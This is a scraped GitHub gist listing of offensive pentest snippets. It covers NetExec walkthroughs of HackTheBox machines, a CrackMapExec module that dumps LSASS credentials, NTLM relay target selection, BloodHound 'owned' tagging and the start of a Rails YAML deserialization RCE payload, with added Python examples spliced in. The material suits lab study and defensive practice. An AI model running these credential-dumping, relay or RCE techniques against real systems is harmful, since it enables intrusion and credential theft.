Force your luck, hold your happiness tight and go toward your risk.
mpgn /
Last active April 17, 2024 17:04
NetExec vs Absolute

In progress

  1. First we get the domain name, so we can add it to our /etc/hosts file
netexec smb
SMB    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
  • Domain name: absolute.htb
  • Netbios name: DC
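The /etc/hosts step above, as an added Python example that is not part of mpgn's gist: it parses NetExec's SMB banner lines into host, domain and signing status, emits the /etc/hosts entries (the bare domain is aliased only to the DC, so Kerberos and LDAP lookups of the realm land on the DC), and lists the hosts with SMB signing disabled, which is what `nxc smb --gen-relay-list` writes out for ntlmrelayx. The sample output is constructed: NetExec prints the target IP between the protocol and the port, and that column is missing from the copy above, so the IPs 192.0.2.10/.20 and the second host WS01 are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nxc smb <targets>` output. The first line is the DC banner
# from the walkthrough above with an assumed IP re-inserted; WS01 is invented so
# that one host has SMB signing disabled.
SAMPLE_OUTPUT = """\
SMB         192.0.2.10      445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB         192.0.2.20      445    WS01             [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:absolute.htb) (signing:False) (SMBv1:False)
"""

BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.+?)\s+"
    r"\(name:(?P<name>[^)]+)\)\s+\(domain:(?P<domain>[^)]+)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


@dataclass
class SmbHost:
    ip: str
    name: str
    domain: str
    os: str
    signing: bool
    smbv1: bool

    @property
    def fqdn(self) -> str:
        return f"{self.name}.{self.domain}".lower()


def parse_banners(output: str) -> list:
    """Parse NetExec SMB banner lines; lines that are not banners are skipped."""
    hosts = []
    for line in output.splitlines():
        m = BANNER_RE.match(line.strip())
        if not m:
            continue
        hosts.append(SmbHost(
            ip=m["ip"], name=m["name"], domain=m["domain"], os=m["os"],
            signing=m["signing"] == "True", smbv1=m["smbv1"] == "True",
        ))
    return hosts


def hosts_entries(hosts: list, dc: str) -> list:
    """One /etc/hosts line per host: IP, FQDN, short name. The bare domain name is
    aliased only to the DC so that lookups of the domain itself hit the DC."""
    lines = []
    for h in hosts:
        aliases = [h.fqdn, h.name]
        if h.name.upper() == dc.upper():
            aliases.insert(1, h.domain.lower())
        lines.append(f"{h.ip} " + " ".join(aliases))
    return lines


def relay_targets(hosts: list) -> list:
    """IPs with SMB signing off: NTLM relay candidates (what --gen-relay-list writes)."""
    return [h.ip for h in hosts if not h.signing]


if __name__ == "__main__":
    parsed = parse_banners(SAMPLE_OUTPUT)
    print("\n".join(hosts_entries(parsed, dc="DC")))
    print("relay targets:", relay_targets(parsed))
```

Pipe real output in with `nxc smb 192.0.2.0/24 | python3 nxc_hosts.py` style wrappers if you like; the regex only matches banner lines, so login results and errors in the same stream are ignored.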
mpgn / Scrambled vs NetExec .md
Last active April 23, 2024 03:03
Scrambled vs NetExec for fun and profit by @mpgn_x64

Scrambled vs NetExec

Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup by 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup that was true, but not anymore: it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will skip the web part, where we get one username: ksimpson

# If the PowerShell check returns True, or one of the reg queries below returns without error, you are infected!
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
mpgn /
Created November 2, 2020 11:01 — forked from 1mm0rt41PC/
Wifi easy PEAP relay
# Wifi easy PEAP relay
# Author: 1mm0rt41PC - -
# Ref:
# -
# -
# -
# -
mpgn / Blackfield vs NetExec .md
Last active April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
mpgn / PowerView-3.0-tricks.ps1
Created March 29, 2020 16:35 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
mpgn /
Created November 26, 2019 15:12
CrackMapExec module that marks every target owned by the attacker as "owned" in BloodHound


  • Copy it into cme/modules/ and reinstall CrackMapExec (python install)
  • pip install neo4j


cme smb -d adsec.local -u jsnow -p Winter_is_coming_\! -M bloodhound_owned
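What such a module has to do, as an added Python example that is not mpgn's gist code: BloodHound stores Computer nodes under their upper-case FQDN (DC.ABSOLUTE.HTB), while CME hands the module the NetBIOS name and the domain separately, so the name has to be rebuilt before the Cypher update `SET c.owned = true` can match anything. The CME hook and attribute names used here (`options`, `on_admin_login`, `context.log`, `connection.hostname`, `connection.domain`, upper-case keys in `module_options`) are assumed from the CrackMapExec module API; the `FakeSession` class is a constructed offline stand-in for a neo4j driver session so the logic runs without a database.

```python
# Hypothetical CME module, added as an example (not mpgn's gist code). The hook and
# attribute names follow the CrackMapExec module API and are assumptions here.

OWNED_QUERY = (
    "MATCH (c:Computer {name: $name}) "
    "SET c.owned = true "
    "RETURN count(c) AS updated"
)


def bloodhound_name(hostname: str, domain: str) -> str:
    """BloodHound stores Computer nodes as upper-case FQDNs, e.g. DC.ABSOLUTE.HTB."""
    return f"{hostname}.{domain}".upper()


def mark_owned(session, hostname: str, domain: str) -> int:
    """Flag the computer as owned; returns how many nodes matched (0 means the host
    is not in the graph, e.g. the SharpHound collection predates it)."""
    result = session.run(OWNED_QUERY, name=bloodhound_name(hostname, domain))
    record = result.single()
    return int(record["updated"]) if record else 0


class FakeSession:
    """Constructed offline stand-in for neo4j's Session over a one-node graph."""

    def __init__(self, known=("DC.ABSOLUTE.HTB",)):
        self.known = set(known)
        self.calls = []

    def run(self, query, **params):
        self.calls.append((query, params))
        updated = 1 if params.get("name") in self.known else 0

        class _Result:
            def single(self_inner):
                return {"updated": updated}

        return _Result()


class CMEModule:
    name = "bloodhound_owned"
    description = "Mark every host we got admin on as owned in BloodHound"
    supported_protocols = ["smb"]
    opsec_safe = True
    multiple_hosts = True

    def options(self, context, module_options):
        """URI, USER, PASS: Neo4j connection, e.g. -o URI=bolt://127.0.0.1:7687."""
        self.uri = module_options.get("URI", "bolt://127.0.0.1:7687")
        self.user = module_options.get("USER", "neo4j")
        self.password = module_options.get("PASS", "neo4j")

    def on_admin_login(self, context, connection):
        # Fires only when the credentials gave local admin, i.e. the host is owned.
        from neo4j import GraphDatabase  # pip install neo4j
        driver = GraphDatabase.driver(self.uri, auth=(self.user, self.password))
        try:
            with driver.session() as session:
                n = mark_owned(session, connection.hostname, connection.domain)
        finally:
            driver.close()
        fqdn = bloodhound_name(connection.hostname, connection.domain)
        if n:
            context.log.success(f"{fqdn} marked as owned in BloodHound")
        else:
            context.log.info(f"{fqdn} not found in BloodHound, collect it first")


if __name__ == "__main__":
    s = FakeSession()
    print("DC:", mark_owned(s, "DC", "absolute.htb"), "WS01:", mark_owned(s, "WS01", "absolute.htb"))
```

The `count(c)` return value is what tells you the difference between "marked" and "silently matched nothing", which is the usual failure when the NetBIOS name CME saw differs from the DNS name SharpHound collected.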
mpgn /
Last active December 6, 2019 17:50
Procdump CME module that dumps the LSASS process and extracts the result with pypykatz
  1. Install pypykatz (pip install pypykatz) outside your pipenv
  2. Add this file to cme/modules/
  3. Reinstall CrackMapExec (python install)
  4. Run cme smb -u Administrator -p P@ssword -M procdump


mpgn / railspwn.rb
Created March 18, 2019 21:21 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
class DeprecatedInstanceVariableProxy